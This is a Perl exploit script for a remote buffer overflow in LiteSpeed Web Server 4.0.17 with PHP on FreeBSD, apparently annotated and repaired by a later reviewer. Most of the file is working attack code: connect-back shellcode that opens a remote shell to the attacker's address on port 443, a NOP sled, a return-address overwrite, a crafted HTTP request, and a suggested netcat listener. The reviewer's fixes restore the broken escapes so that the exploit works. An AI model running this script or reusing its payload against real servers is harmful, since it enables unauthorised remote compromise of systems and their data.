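#!/usr/bin/perl
#
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
# bug discovered & exploited by Kingcope, Dec 2010
#
# Tested with success on:
#   FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
#   FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
#   FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86
#
# Can be used against the admin interface (port 7080), too.
# Only works on the default (shipped) lsphp binary, not a locally compiled one.
#
# This should be exploitable on Linux too (on the compiled SAPI version).
# The shipped Linux lsphp has stack cookies enabled, which could be brute
# forced if there wasn't a NUL put at the end of the exploit buffer.  The
# compiled SAPI version is exploitable, but then the offsets differ from box
# to box, so this time FreeBSD targets only; on Linux this is very tricky.
#
# See lsapilib.c line 1240
# (http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)
#
# This is a proof of concept - don't try this on real boxes.
#
# Review notes on this copy of the file:
#   * Every "\x.." byte escape, "\r\n" and "\n" in the circulated copy had
#     been mangled to "/x..", "/r/n" and "/n".  As literal slashes the
#     shellcode, the NOP sled and the HTTP line endings were plain text and
#     the request could never have worked; the escapes are restored here.
#   * strict/warnings, an argument-count check, a numeric port check and
#     resolve/connect error handling were added; behaviour on the wire is
#     otherwise unchanged.
#   * The callback PORT is hard-coded at 443 inside the shellcode (the two
#     bytes 0x01 0xbb, big-endian 443, at offset 41); only the callback IP is
#     patched in (offset 37).  Start a listener first, e.g. `nc -l -p 443`.
#
# usage: litespeed-remote.pl <target ip/host> <target port> <your ip> <php file on remote host>

use strict;
use warnings;
use IO::Socket;

$| = 1;    # unbuffered STDOUT so the shell's output shows up immediately

# Value written over the saved return address: address of a JMP EDX inside
# the stock lsphp binary (per the original notes).  Earlier candidates kept
# from the original for reference:
#   0x28469478   FreeBSD 7.3-RELEASE
#   0x082703c0   FreeBSD 6.3-RELEASE  (written 0x82703c0 in the original)
use constant JMP_EDX_LSPHP => 0x080F40CD;

# Bytes before the saved return address in the overflowed buffer.  The
# original spelled this as "A" x 263 . "AAAA" x 6, i.e. 263 + 24 = 287.
use constant RET_OFFSET => 287;

# Trailing filler after the return address (from the original: "C" x 500).
use constant TRAILER_LEN => 500;

# Length of the NOP (0x90) sled placed in front of the shellcode.
use constant NOP_SLED_LEN => 3000;

# Offset of the four 0x41 placeholder bytes that receive the callback IP.
# 13 bytes of setreuid prologue + 24 bytes of socket setup = 37.
use constant IP_PLACEHOLDER_OFFSET => 37;

# FreeBSD/i386 connect-back shellcode (from the original).  Syscall numbers
# per the FreeBSD i386 table: 126 setreuid, 97 socket, 98 connect, 90 dup2,
# 59 execve, 1 exit.  Contains no NUL bytes.
my $BSD_CONNECT_BACK =
    # setreuid(0, 0) - "no root here" per the original author; kept as-is
    "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80" .
    # socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
    "\x31\xc0\x31\xdb\x53\xb3\x06\x53" .
    "\xb3\x01\x53\xb3\x02\x53\x54\xb0" .
    "\x61\xcd\x80\x31\xd2\x52\x52\x68" .
    # sockaddr_in: 0x41414141 = IP placeholder (patched), 0x01bb = port 443
    "\x41\x41\x41\x41\x66\x68\x01\xbb" .
    "\xb7\x02\x66\x53\x89\xe1\xb2\x10" .
    # connect(); exit(1) on failure
    "\x52\x51\x50\x52\x89\xc2\x31\xc0" .
    "\xb0\x62\xcd\x80\x31\xdb\x39\xc3" .
    "\x74\x06\x31\xc0\xb0\x01\xcd\x80" .
    # dup2(sock, 0/1/2)
    "\x31\xc0\x50\x52\x50\xb0\x5a\xcd" .
    "\x80\x31\xc0\x31\xdb\x43\x53\x52" .
    "\x50\xb0\x5a\xcd\x80\x31\xc0\x43" .
    "\x53\x52\x50\xb0\x5a\xcd\x80\x31" .
    # execve("//sh" + "/bin" => "/bin//sh")
    "\xc0\x50\x68\x2f\x2f\x73\x68\x68" .
    "\x2f\x62\x69\x6e\x89\xe3\x50\x54" .
    "\x53\x50\xb0\x3b\xcd\x80\x31\xc0" .
    # exit()
    "\xb0\x01\xcd\x80";

# Print the usage banner (same text as the original) and exit.
sub usage {
    print "written by kingcope\n";
    print "usage:\n"
        . "litespeed-remote.pl <target ip/host> <target port> <your ip> <php file on remote host>\n\n"
        . "example:\n"
        . "perl litespeed-remote.pl 192.168.2.3 8088 192.168.2.2 phpinfo.php\n\n";
    exit;
}

# Return a copy of the connect-back shellcode with the callback address
# patched in.  $packed_ip is a 4-byte packed IPv4 address (the scalar form
# returned by gethostbyname / inet_aton).  Dies if it is not 4 bytes, since
# substr() with a shorter/longer replacement would shift every later byte.
sub callback_shellcode {
    my ($packed_ip) = @_;
    die "callback address must be a packed 4-byte IPv4 address\n"
        unless defined $packed_ip && length($packed_ip) == 4;
    my $sc = $BSD_CONNECT_BACK;
    substr($sc, IP_PLACEHOLDER_OFFSET, 4, $packed_ip);
    return $sc;
}

# Build the stack-smashing string: RET_OFFSET bytes of filler, the return
# address as a little-endian dword ($ret defaults to JMP_EDX_LSPHP), then
# TRAILER_LEN bytes of padding.
sub overflow_buffer {
    my ($ret) = @_;
    $ret = JMP_EDX_LSPHP unless defined $ret;
    return ('A' x RET_OFFSET) . pack('V', $ret) . ('C' x TRAILER_LEN);
}

# Assemble the raw HTTP request exactly as the original sent it.
#   $target - value for the Host header
#   $file   - PHP file on the remote host, appended after "/../"
#   $sc     - shellcode (already IP-patched); a NOP sled is prepended here
#   $ovf    - output of overflow_buffer()
# The request line carries six 0x90 bytes and 0xEB 0x50 (x86 `jmp short
# +0x50`) before "/../$file"; the original does not explain why - presumably
# EDX points into the request line when the JMP EDX fires.  Confirm against
# lsapilib.c before changing anything here.  The shellcode travels in a bogus
# "VVVV:" header and the overflow string in a bogus "KINGCOPEH4XXU:" header.
sub build_request {
    my ($target, $file, $sc, $ovf) = @_;
    my $sled = ("\x90" x NOP_SLED_LEN) . $sc;
    return "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file? HTTP/1.1\r\n"
        . "Host: $target\r\n"
        . "VVVV: $sled\r\n"
        . "$ovf KINGCOPEH4XXU:\r\n"
        . "\r\n";
}

# Entry point: parse the four arguments, resolve the callback host, send the
# request and echo whatever the server sends back.  Returns the exit status.
sub main {
    my @args = @_;
    usage() unless @args == 4;
    my ($target, $port, $cbip, $file) = @args;

    die "target port must be numeric, got '$port'\n"
        unless $port =~ /\A[0-9]+\z/;

    # Scalar-context gethostbyname yields the packed IPv4 address (or undef).
    my $packed_ip = gethostbyname($cbip);
    die "cannot resolve callback host '$cbip'\n"
        unless defined $packed_ip && length($packed_ip) == 4;

    my $request = build_request(
        $target, $file, callback_shellcode($packed_ip), overflow_buffer(),
    );

    my $sock = IO::Socket::INET->new(
        PeerAddr => $target,
        PeerPort => $port,
        Proto    => 'tcp',
    ) or die "connect to $target:$port failed: $@\n";

    print {$sock} $request;
    while (my $line = <$sock>) {
        print $line;
    }
    close $sock;
    return 0;
}

exit main(@ARGV) unless caller;

1;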